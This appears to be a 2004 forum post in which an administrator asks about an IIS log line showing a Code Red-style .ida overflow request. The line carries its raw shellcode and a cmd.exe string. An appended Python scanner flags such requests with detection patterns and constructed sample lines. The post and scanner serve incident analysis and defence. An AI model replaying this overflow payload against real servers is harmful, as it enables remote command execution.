New IIS Exploit?

Has anyone seen activity like this? I have the IIS Lockdown tool installed with all patches (double-checked with Baseline Security Analyzer) and it still spawned 25+ cmd.exe processes. Problem is, I don't know what it's doing with the command shell. I've replaced my IP with 204.95.x.x.

Also, it looks similar to Code Red in form, but much longer.

2004-01-04 12:29:31 218.155.6.250 - W3SVC1 hosting01 204.95.x.x 80 GET /NULL.IDA CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC%u0aeb%ub890%udacf%u77ee%u0000%u0000%u838b%u0094%u0000%u408b%u0564%u 0150%u0000%ue0ff%u9090=x&ë+_됐èõÿÿÿoð}-‹÷f¸H3Éf‹È´™ü¬2Īâú$쟙™eªP(¹)½k7_Þf™q”™™q™™qכ™™ڜ™™qț™™q½š™™ޜ™™q'˜™™֜™™ޜ™™q曙™Ҝ™™qǙ™™q™™™a™íyҜ™™Éf+”Ÿ™™ޜ™™Éf+”Ÿ™™ ¶œ™™Éf+œ™™¢œ™™Éf+œ™™!™™™™É֜™™Éf+\œ™™!™™™™Éf+Oœ™™ZҜ™™ó™ó€š˜™™ÉҜ™™Éf+šŸ™™Z”“Îð÷÷íØìíöØííøúò¹Ï«©”“”“ñ+™™™f+&œ™™¶œ™™q_™™™af–/™™™a™íÎ++++󙦜™™Éñ™™™ڜ™™É¶œ™™Éf+/œ™™a™–™™™ó™¦œ™™Éڜ™™ÉҜ™™Éf+šŸ™™afíý++++ró™ñ™™™ڜ™™ÉҜ™™Éf+‘Ÿ™™a™í§++++afí¬++++ªBʦœ™™ÊÉڜ™™É¢œ™™Éf+5œ™™a™í++++p²fffªYÑZªYZª Bʽ›™™ÊªBÊÊÊÉf++œ™™a™í’++++½›™™Z!ffffZ™™™™ڜ™™^™Ý™™™Éf+þœ™™ڜ™™ªœ™™ÚÙÚ¥®œ™™Ú¡!˜˜™™ÚµÊʪYÉÉÉÙÉÑÉÉ쟙™ÉªYÉf+™ªœ™™Éf+œ™™®œ™™Éf +œ™™ڜ™™™Zñ™™™óÙf+9œ™™ZªYÉw›™™^™•™™™Éªœ™™É¶œ™™Éf+Ŝ™™ªYÉw›™™É¢œ™™É®œ™™Éf+Ŝ™™Z™™™™™™™™˜™™™É¸š™™^š‰™™™Ê۝™™ÊÉf+eœ™™Aa™ÁåEZZ‰™™™ óŠöš™™Éf+½Ÿ™™öš™™Éf+©Ÿ™™a™í»++++é•ge4a™íŠ++++™¥“íi¥Yíu¥5íqZn4™Z™™™™™™™™™™™™™™™™™™™™ڜ™™Éó›f+€Ÿ™™ó™ó˜ó›f+pœ™™af–™™™ޜ™™¦œ™™^š˜™™™ó Êóñff™™Éf+§Ÿ™™a™ìé++++ÿöŸ™™ÿݝ™™蟙™ߝ™™afì–++++q³fffߝ™™ޜ™™ó‰۝™™ÊÉf+iœ™™a™ìº++++óœޜ™™Éf+lœ™™a™ì’++++ޜ™™ZªYZ›™™ú™™™™™™™™™™™ ™!™™hî¡ÔÃ+™íž++++ÑrhA꥚jïášj繚b׍ªKÏÎȦšb,ÁŸ™™ªP(žjÿ>í•++++ÀÆ^Û{FÀÆÇSß½šZHxšXªPÿ‘߅šZXx›šX™šZòŸ™™Zҟ™™qə™™þŸ™™Z$ʜ™™^Îq¶™™™ ÆÉ«YªPnHek7Á¦™íŽ++++ÉÎFq„™™™ÆžÁÞÞÞÞr@Þ¦™ìSZÊþŸ™™ÉfŠÂZÎ$òŸ™™ÊÉfŽÆZ™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™ÒÜË×ÜÕª«™ÚëüøíüÉðéü™ÞüíÊíøëíìéÐ÷ÿöؙÚëüøíü ÉëöúüêêØ™ÚõöêüÑø÷ýõü™Éüüò×øôüýÉðéü™ÞõöûøõØõõöú™Îëðíüßðõü™Ëüøýßðõü™Êõüüé™Íüëôð÷øíüÉëöúüêê™ÜáðíÍñëüøý™™Îʫƪ«™êöúòüí™ûð÷ý™õðêíü÷™øúúüéí™êü÷ý™ëüúï™úõöêüê öúòüí™ÎÊØÊíøëíìé™þüíñöêí÷øôü™þüíñöêíûà÷øôü™êüíêöúòöé홙™ÕöøýÕðûëøëàØ™ÞüíÉëöúØýýëüêê™êëî¨éî™úUÆr5cmd.exe$ 200 0 190 2070 219 HTTP/1.1 204.95.x.x:80 - - -


Thanks in advance...

Greg
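The request in the log above has the shape of an Index Server ISAPI (.ida/.idq) overflow, the same form as Code Red that the poster notes: a long run of filler characters in the query, %uXXXX-encoded data, and a literal cmd.exe string near the end. The following added example is not part of the original post; it is a small Python scanner that flags lines of this shape in an IIS W3C extended log so the affected requests, source addresses and response codes can be pulled out for review. It assumes the default IIS 5 field order visible in the poster's line (ten fields before the query, ten after it), and the indicator thresholds (200 repeated characters, four %u escapes) are assumptions chosen for illustration. The sample log lines are constructed, with a stand-in filler in place of real payload bytes.

```python
import re

# Fields before the query string in the poster's line (IIS 5 W3C extended, default order):
# date time c-ip cs-username s-sitename s-computername s-ip s-port cs-method cs-uri-stem
LEADING = ["date", "time", "c_ip", "user", "site", "host", "s_ip", "s_port", "method", "stem"]
# Fields after the query string in the same line:
# sc-status sc-win32-status sc-bytes cs-bytes time-taken cs-version cs-host cs(User-Agent) cs(Cookie) cs(Referer)
TRAILING = ["status", "win32_status", "sc_bytes", "cs_bytes", "time_taken",
            "version", "cs_host", "user_agent", "cookie", "referer"]

# Assumed indicator thresholds (not from the post): 200+ copies of one character is
# overflow padding, four or more %uXXXX escapes is unicode-encoded code in the query.
LONG_RUN = re.compile(r"(.)\1{199,}")
UNICODE_ESC = re.compile(r"%u[0-9a-fA-F]{4}")


def parse_w3c_line(line):
    """Split one log line into a dict keyed by field name, or return None if the
    line does not have the expected number of columns. The query is taken as
    everything between the leading and trailing fields, so stray spaces produced
    by binary payload bytes (as in the poster's line) do not shift the columns."""
    head = line.rstrip("\r\n").split(" ", len(LEADING))
    if len(head) != len(LEADING) + 1:
        return None
    rec = dict(zip(LEADING, head[:-1]))
    tail = head[-1].rsplit(" ", len(TRAILING))
    if len(tail) != len(TRAILING) + 1:
        return None
    rec["query"] = tail[0]
    rec.update(zip(TRAILING, tail[1:]))
    return rec


def score_request(rec):
    """Return the list of indicators present in one parsed request."""
    reasons = []
    query = rec["query"]
    if rec["stem"].lower().endswith((".ida", ".idq")):
        reasons.append("request to Index Server ISAPI extension (.ida/.idq)")
    if LONG_RUN.search(query):
        reasons.append("run of 200+ identical characters in query (overflow padding)")
    if len(UNICODE_ESC.findall(query)) >= 4:
        reasons.append("%uXXXX-encoded data in query")
    if "cmd.exe" in query.lower():
        reasons.append("'cmd.exe' present in query")
    return reasons


def scan_log(lines, min_indicators=2):
    """Parse each line and report those with at least min_indicators indicators.
    The response code is kept because a 200 on such a request means the ISAPI
    extension processed it, while a 404 typically means a filter such as URLScan
    rejected the URL before the extension ran."""
    hits = []
    for line in lines:
        rec = parse_w3c_line(line)
        if rec is None:
            continue
        reasons = score_request(rec)
        if len(reasons) >= min_indicators:
            hits.append({"time": rec["time"], "c_ip": rec["c_ip"], "stem": rec["stem"],
                         "status": rec["status"], "reasons": reasons})
    return hits


# Constructed sample log: one ordinary hit, one request shaped like the poster's
# line (stand-in filler and escapes, no real payload), and the same probe rejected
# with a 404 by URL filtering before the extension ran.
SAMPLE_LOG = [
    "2004-01-04 12:29:30 10.0.0.5 - W3SVC1 hosting01 192.0.2.10 80 GET /index.htm - "
    "200 0 4120 310 15 HTTP/1.1 192.0.2.10:80 Mozilla/4.0+(compatible) - -",
    "2004-01-04 12:29:31 198.51.100.7 - W3SVC1 hosting01 192.0.2.10 80 GET /NULL.IDA "
    + "X" * 240 + "%u9090%u9090%u9090%u9090=x&\x99\x99 \x99cmd.exe$ "
    "200 0 190 2070 219 HTTP/1.1 192.0.2.10:80 - - -",
    "2004-01-04 12:30:02 198.51.100.7 - W3SVC1 hosting01 192.0.2.10 80 GET /NULL.IDA "
    + "X" * 240 + "%u9090%u9090%u9090%u9090=x& "
    "404 0 0 2070 3 HTTP/1.1 192.0.2.10:80 - - -",
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['time']} {hit['c_ip']} {hit['stem']} status={hit['status']}")
        for reason in hit["reasons"]:
            print("   -", reason)
```

Run against a real log with `scan_log(open(path, encoding="latin-1"))`; latin-1 keeps the raw payload bytes as characters instead of failing to decode them. Requiring two indicators keeps a lone long query or a single .ida request from being reported on its own.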
